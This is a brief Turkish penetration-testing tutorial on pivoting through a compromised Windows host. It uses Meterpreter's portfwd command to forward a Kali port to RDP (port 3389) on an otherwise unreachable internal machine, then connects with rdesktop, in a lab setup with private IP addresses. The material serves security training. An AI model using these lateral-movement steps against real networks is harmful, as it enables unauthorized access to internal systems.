Bu yazıda saldırgana ait olan Kali bilgisayarın tek bir IP adresi olup bu adres 10.0.0.50’dir. Meterpreter ile erişim elde edilen Windows bilgisayarın ise, 2 ayrı ağa ait olan iki IP değeri vardır. Birincisi, saldırganın istismar ederken erişebildiği 10.0.0.25 IP adresidir. İkincisi ise, saldırgan tarafından direk olarak erişim sağlanamayan 192.168.0.80 IP adresidir.
ifconfig
Mevcut durumda, 192.168.0.75 IP adresli bilgisayara uzak masaüstü bağlantısı gerçekleştirilememektedir.
netstat -nlpt | grep 12345
rdesktop 192.168.0.75
Windows istemci üzerinden 192.168.0.0/24 ağına erişim sağlamak için Meterpreter portfwd komutu kullanılabilir. Bu amaçla, komutun seçenekleri incelenir, yerel port yönlendirme işlemi gerçekleştirilir. Örnek olarak, Kali bilgisayarın 12345. portuna gelen taleplerin, Meterpreter bağlantısı üzerinden 192.168.0.75 IP adresli bilgisayarın 3389. portuna yönlendirilmesi sağlanabilir. Sonuçta da, yerel port yönlendirme tablosuna yeni bir girdi eklenmiş olur.
portfwd -h
portfwd list
portfwd add -l 12345 -r 192.168.0.75 -p 3389
Meterpreter oturumunda yerel port yönlendirme tablosuna yeni girdi eklenmesiyle, Linux bilgisayar üzerindeki bir araç (rdesktop gibi) tarafından yerel bilgisayarın 12345. portuna yapılan talepler, Meterpreter bağlantısı üzerinden, 192.168.0.75 IP adresli bilgisayarın 3389. portuna gider.
netstat -nlpt | grep 12345
rdesktop 127.0.0.1:12345
Erişim sağlandıktan sonra port yönlendirmeyi kaldırmak için “delete” seçeneği kullanılabilir.
portfwd delete -l 12345 -r 192.168.0.75 -p 3389
Bunun yanında mevcut durumu görmek için “list”, tüm yönlendirmeleri kaldırmak için de “flush” kullanılabilir.
portfwd list
portfwd flush